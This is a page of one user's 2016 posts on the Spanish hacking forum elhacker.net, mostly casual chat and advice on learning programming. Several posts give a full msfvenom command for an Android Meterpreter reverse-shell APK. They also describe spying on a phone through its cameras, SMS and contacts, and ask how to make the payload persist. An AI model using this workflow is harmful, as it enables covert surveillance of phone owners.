elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recopilación Tutoriales y Manuales Hacking, Seguridad, Privacidad, Hardware, etc


  Mostrar Mensajes
Páginas: 1 [2] 3 4 5 6 7 8 9 10 11 12 13 14 15 16
11  Informática / Software / Re: Ustedes leen los terminos y condiciones antes de instalar un programa en: 9 Octubre 2016, 02:28 am
Jajaja pues ni idea la verdad, yo tampoco los leo, cuando le doy a aceptar lo mismo estoy dando permiso para que me vacíen la cuenta bancaria o violen a mi perro...  :xD

Supongo que te perderás poca cosa, si fuese algo de lo anterior, alguien se daría cuenta y daría la voz de alarma, así que tranquilo :laugh:. Pero no solo pasa en el ordenador, también pasa con los permisos de las aplicaciones del teléfono por ejemplo, esos si que los leo, he rechazado alguna app por requerir demasiados permisos, como por ejemplo, para instalar una app (la linterna) que solo debería tener acceso al flash, me pedía la ubicación, acceso a red, modificar el contenido de la tarjeta sd... y mas, mucho mas. Yo pienso que nos tienen mas que controlados con las apps que tenemos en nuestro móvil, no se si pasará lo mismo con el ordenador.

Saludos.
12  Foros Generales / Foro Libre / Re: Pokémon Go ya cuenta el hallazgo de su primer cadáver en: 13 Julio 2016, 17:11 pm
pero que es esto?? :xD me desconecto un tiempo y cuando vuelvo en el foro se habla de pokemon :laugh: Está hasta en la sopa!!!
13  Seguridad Informática / Wireless en Windows / Re: ayuda: que version de beini usar en: 2 Julio 2016, 21:43 pm
La última supongo, aquí te la dejo   :)
beini 1.2.5

Pero wifislax trae esas herramientas y mucho mas, si quieres puedes probarlo

wifislax 4.11.1
14  Foros Generales / Foro Libre / Re: Busco compañeros de aprendizaje. en: 29 Junio 2016, 00:27 am
Citar
Vaya desface no sabia que un post así podía hacer que entrara tanta gente nueva al foro en tan poco tiempo.

Si pero mucho hablar y poco hacer, yo le mandé un mensaje al autor del post y todavía nada...  :rolleyes:

En fin, quien quiera formar un grupo que me mande un mensaje privado, en el que ponga que quiere aprender y mas o menos el nivel, la idea de un grupo para aprender es muy bonita, ¿pero aprender que? Supongo que habría que hacer varios grupos, unos querrán aprender programación, otros de seguridad, etc... Si hacemos algo lo haremos bien.

Aquí estoy para quien quiera seguir con la idea (de verdad).

PD: Grupo de skype creado, gruposelhacker, para mas información escribidme por skype o por privado.

15  Seguridad Informática / Bugs y Exploits / Re: Problema sesion meterpreter Android en: 28 Junio 2016, 19:41 pm
Hola de nuevo, siento haber tardado en responder. Cuando dije "puede que me equivoque" lo dije muy en serio  :laugh:, pensándolo mejor (yo también soy novato), creo que ese no es tu problema, a mi me sucedió lo mismo una vez, y deduje que podría ser por eso, pero se trataba de de otra situación diferente, yo cree una sesión en una impresora con la contraseña que tenía por defecto, pero me cerraba la sesión cada dos por tres y decidí pasar el diccionario a ver si la sesión era "falsa", me dio varias contraseñas por correctas. Puede que sea normal o puede que no, de igual manera que en esta pagina por ejemplo, tu tienes tu datos y yo los míos, puede ser igual en cualquier otra parte.

Resumiendo: No creo que tu problema sea el mismo, por lo que dices ya tienes el payload instalado y "funcionando", dices también que as colocado correctamente los puertos y la ip (es un fallo típico poner la ip publica al escuchar, fue mi principal error :xD hasta que vi un tutorial).

Lo único que se me ocurre que esté fallando, es que se te aya podido olvidar abrir los puertos de tu router, cuando la conexión es fuera de la lan es necesario hacerlo.
No se si llegaré a tiempo, no he visto tu respuesta asta ahora y he tardado mucho en responder, pero si lo lees espero que te ayude.

16  Seguridad Informática / Bugs y Exploits / Re: problema con payload en android en: 27 Junio 2016, 21:02 pm
Hola gracias por responder,
Citar
el comando: "msfvenom --platform android -p android/meterpreter/reverse_tcp LHOST=192.168.43.167 LPORT=53 R > ANDROID3.apk" pienso que esta mal, ya que añades la plataforma dos veces

Jajaja me lo figuraba, pero soy bastante nuevo y al ver que no me funcionaba, decidí probar mas cosas a ver que pasaba, no he conseguido solucionar el problema, pero si se "cual" es, y eso me preocupa, veréis porque
El problema no es el payload o msfvenom, es el teléfono, busqué en google, y resulta que surge cuando en el teléfono hay otra aplicación con el mismo certificado, por ejemplo si quieres instalar una versión posterior de una app y tienes la antigua todavía instalada en el teléfono. De modo que decidí probar con otro "sujeto", y conseguí instalarla  ;-), algo que me decepcionó bastante fue que lo detectaron todos los antivirus  :rolleyes: tuve que desinstalarlos todos, después todo fue bien, conseguí una shell remota y aunque no conseguí escalar privilegios, si pude hacer algunas cosillas que me dejaron sorprendido  :D, ver por las dos camaras (lo único que cada imagen que me manda hace sonar "clic" de la cámara, muy discreto no es :xD), enviar sms, ver los contactos sus mensajes y mas  ;D
Aquí viene la parte que me preocupa, el error de "la aplicación no esta instalada" me salió en el nuevo teléfono varias veces, ya que le instalé mas de un payload, quería conseguir conectarme a el fuera de lan (conseguido  :)), pero en el primer teléfono por que sale? es la primera vez que instalo un payload en el  :o puede ser que alguien lo aya hecho antes que yo?

Aprovecharé el tema para plantear otra duda, de vez en cuando pierdo la conexión con la shell remota, y me cierra la sesión, es un fastidio tener que volver a ponerlo a la escucha cada vez que ocurre, no sería mucho problema si no fuera por que no consigo que el payload se inicie automáticamente, cada vez que quiero conectarme tengo que pulsar el icono de la app, no hay ninguna forma de hacer que el payload se inicie solo y no tener que hacerlo?

Agradezco cualquier ayuda, gracias.
17  Seguridad Informática / Bugs y Exploits / problema con payload en android en: 26 Junio 2016, 16:02 pm
Hola a todos, tengo un problema al instalar un payload en un teléfono android, he generado al payload con msfvenom y no se si lo he hecho de la forma correcta, dejo el comando:
Código:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.167 LPORT=53 R > ANDROID3.apk

También le he añadido:
Código:
msfvenom --platform android -p android/meterpreter/reverse_tcp LHOST=192.168.43.167 LPORT=53 R > ANDROID3.apk
Me salen algunas cosas sin rellenar,
Código:
No Arch selected, selecting Arch: dalvik from the payload                                                                                            
No encoder or badchars specified, outputting raw payload  
pero en un tutorial que he visto le vasta con el primer comando para crear una sell remota.
Este es el proceso:
Msfvenom genera el payload con la extensión .apk, lo paso a  un soy experia tipo (reliquia :laugh:) y pongo handler en escucha, cuando voy a instalar el archivo .apk me sale el instalador, muestra los permisos, le doy a aceptar y sale como si se instalase, pero dice "la aplicación no está instalada" y sale de la instalación sin que el handler pille nada.

Que puedo estar haciendo mal? Lo mas seguro es que sea lo que me advierte el propio msfvenom, pero en el tutorial no tenían ningún problema sin esos comandos.
18  Comunicaciones / Android / Re: ¿por que android demora mucho en borrar archivos? en: 26 Junio 2016, 04:15 am
Jaja bueno, yo poco puedo aportar, solo una pregunta, utilizas usb 2.0 o 3.0? aquí te dejo un vídeo que puede serte util



El cambio se nota, te lo aseguro
19  Foros Generales / Foro Libre / Re: Tengo un lio de mil demonios en: 26 Junio 2016, 04:04 am
Hason, cada vez que te leo me quedo mas alucinado  :o. Pero tío, nadie se toma tantas molestias, estas hablando de que Google te vigila, de que los médicos y la policía pueden estar compinchados con "tu atacante", que emplea no solo la tecnología para atacar, si no también utiliza armas biológicas!  :o Dices que tiene acceso a "ti", que te hace consumir drogas sin que tu lo sepas, que no solo afecta a ti si no a tu familia también, DICES COSAS QUE RESULTAN MUY IMPROBABLES!!!

Tío, yo soy de esas personas que no dejan nada por seguro, no me gusta tachar algo de mentira sin comprobar que no lo sea, reconozco que tu caso me preocupó al principio, incluso pregunté a alguien sobre el tema, pero hablas de conspiración en tu contra, hablas de alguien o de una organización super organizada, se me ocurre que para hacerte lo que dices durante años tendrían que tener gente muy preparada, contactos, inventario para rato y pasta para invertir... Las preguntas que me planteo y que quiero que tu te plantees son las siguientes:

Cuando empezó todo? De verdad merece la pena tanto esfuerzo por joderte? Por que va alguien a tomarse la molestia?
Y para la ultima as de ser objetivo e intentar mirar el problema desde fuera, como lo hago yo:
Existe alguna posibilidad de que lo que me este pasando no tenga nada que ver con hackers ni con conspiraciones?

Yo no juzgo, ni me gusta reírme de nadie, procuro tomarte lo mas enserio que puedo, pero no me dejas muchas opciones, te explicas "demasiado" pero tampoco dices nada, as escrito 10.000 palabras, pero podrías haber dicho lo mismo en 100, no dices quien crees que puede ser, ni el porqué (lo mas importante en mi opinión).

Si dices tener alguna prueba, por favor, no dudes en facilitarla, si lo que dices bien suena a novela de ficción, si fuera cierto podría significar algo bastante importante... Como ya he dicho no doy nada por falso por muy imposible que suene, si necesito pruebas para darlo por echo, para no hacerlo también.

Resumiré con lo siguiente:
Hason, si tienes alguna prueba o información que sea relevante, estaré encantado de ayudar en lo que pueda (dentro de mis limitaciones), sea en publico o por mensaje privado, como mejor te venga, pero advierto! Seriedad Hason, sangre fría, sea un problema real o no, debe solucionarse, por lo que dices vivir así no es agradable, y quiero ayudarte, pero debes estar abierto al escepticismo, a la posibilidad de que todo esté en tu cabeza, si yo hago un esfuerzo por creer, tu debes hacerlo por comprender.

Añado que me la pela de arriba a abajo meterme en líos, si resulta que algo es cierto no me echaré atrás. Pero si detecto una sola mentira zanjaré sin mediar palabra.

Si crees que mi oferta puede serte útil, aquí estoy.
20  Programación / Scripting / Re: Lenguajes de programación para iniciarse? en: 25 Junio 2016, 19:00 pm
RE: Elektro
Hola de nuevo, perdón por la tardanza en responder, quería hacerlo con windows 10 ya instalado y el Visual Studio funcionando, pero he tenido un problemilla (ya he abierto un post con dicho problema)y me a sido imposible instalar win 10, así que de momento tendré que esperar un poco mas.
Citar
Evidentemente lo que debes descargar es Visual Studio
Echo, esta preparado para cuando instale win 10  ;-)
Citar
Deberás elegir entre uno de los lenguajes: C# o VB.NET
Me decanto por VB.NET, he visto un par de ejemplos y me a gustado mas, creo que puedo aprenderlo y entenderlo mejor.
Citar
También deberás elegir una tecnología en la que empezar a programar
Pues me gustaría programar para dispositivos móviles, creo que se acerca un gran avance en ese tema y además todo el mundo tiene uno, así que sería la opción que mas me gusta.
Citar
lo ideal es que te documentes en Inglés, y utilices Visual Studio en Inglés, pero eso ya es cosa tuya
Pues eso es mas difícil, de ingles entiendo lo justo, voy aprendiendo sobre la marcha, pero creo que tendré que usar Visual Studio en español, si no, no entenderé la mayor parte de los textos  :P
Citar
Cualquier duda que tengas sobre VB.NET/C# estaré encantado de ayudarte, como puedes ver me apasiona .NET ...y poder resolver problemas relacionados (siempre que pueda resolverlos xD).
Te agradezco mucho la ayuda  :), es bueno saber que cuento con alguien que sepa del tema, intentaré que los problemas que te consulte tengan solución   :laugh:
Citar
Tengo una librería gratuita para .NET que abarca todo tipo de materias de forma bastante completa, eso te podría servir para resolver muchos problemas cotidianos y/o implementar muchos algoritmos
Gracias, debo decir que todavía no se muy bien para que es cada cosa, pero por lo que dices me será de mucha utilidad, te simplifica mucho las tarea  :)

RE: peter_lyon

Citar
Os veo un poco despistados en estos temas pero veo mucho interés y ganas de aprender
Yo siempre voy despistado  :xD, si hay ganas de aprender, la informática es el futuro, yo creo que las profesiones con mas trabajo serán las que tengan que ver con ella, asta el DNI lleva un chip ya, y no solo por el trabajo, si no porque tener los conocimientos adecuados te hace capaz de crear cosas increíbles de la nada, y eso es algo que me apasiona  ;D

Citar
el primer consejo que os voy a dar es que eliminéis windows de vuestras mentes
En caso de estudiar seguridad (cosa que también me gusta) tienes razón, pero si quiero estudiar programación y diseñar aplicaciones lo mejor es Visual Studio, no?
Citar
windows es un SO muy pobre, con muchos problemas y que va camino a desaparecer a medio plazo.
Te doy la razón en las dos primeras afirmaciones, pero no creo que windows esté por desaparecer, tiene muchos fallos, pero otras cosas hacen de windows un so necesario, programas que solo son compatibles con win (como Visual studio  :() y cosas que pueden ser mas sencillas de hacer para un usuario básico en win que en Linux, una vez que te adaptas a Linux no sueles hechar de menos a windows, pero a veces (cuando wine falla xD) se le hecha en falta.

Citar
Huid a toda costa de tecnologías privativas (VB, Batch, .net, Visual C++...) hoy en día todo se puede hacer con 3 lenguajes fundamentales que todo buen informático debe saber: C++, JS y Python.
Ala, tenía unos cimientos montados y ahora esto :laugh:, estos lenguajes sirven para cualquier plataforma? para cualquier tipo de uso? Podría crear una aplicación con VB y dejarla exactamente igual con C++?
Citar
Para empezar, desde luego Python es vuestra mejor carta
Pues también tendré que echarle un ojo, no he visto tantos códigos en mi vida, (por la noche sueño en batch, tengo pesadillas con errores de sintaxis que no veo  :xD)
Citar
Estáis muy ligados a las tecnologías de Microsoft y no veis más allá de ello
Alaa, que va, la ultima vez que utilicé win solo me duró dos semanas instalado, ahora cada vez que lo tengo instalado me da la paranoia de que hay virus por todas partes  :rolleyes:

Pues me quedo con mas dudas que respuestas, echare un ojo a los lenguajes aquí mencionados a ver cual puede ser "el elegido"(o "elegidos") para iniciarme.
Una vez mas, gracias a todos por la ayuda, seguiré en ello  :D
Páginas: 1 [2] 3 4 5 6 7 8 9 10 11 12 13 14 15 16
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines